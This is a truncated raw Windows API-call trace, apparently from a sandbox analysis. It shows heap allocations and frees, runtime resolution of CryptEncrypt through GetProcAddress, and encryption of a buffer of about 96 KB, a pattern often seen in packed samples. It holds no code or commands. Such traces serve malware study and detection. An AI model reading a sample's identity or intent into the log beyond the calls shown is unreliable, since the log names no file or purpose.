[0247.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0247.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.516] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0247.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51a78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0247.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0247.518] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e541c0 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0247.559] CryptEncrypt (in: hKey=0xa873d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17863, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x17868) returned 1 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0247.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0247.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0247.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0247.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0247.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0247.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0247.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.563] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0247.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0247.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0247.564] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0247.564] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0247.564] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0247.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0247.565] CharLowerBuffW (in: lpsz="byte[96360]", cchLength=0xb | out: lpsz="byte[96360]") returned 0xb [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17868) returned 0x2e96b90 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0247.566] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0247.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0247.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17863) returned 0x2eae400 [0247.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17863) returned 0x2ec5c70 [0247.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0247.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0247.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0247.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eae400 | out: hHeap=0x970000) returned 1 [0247.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | 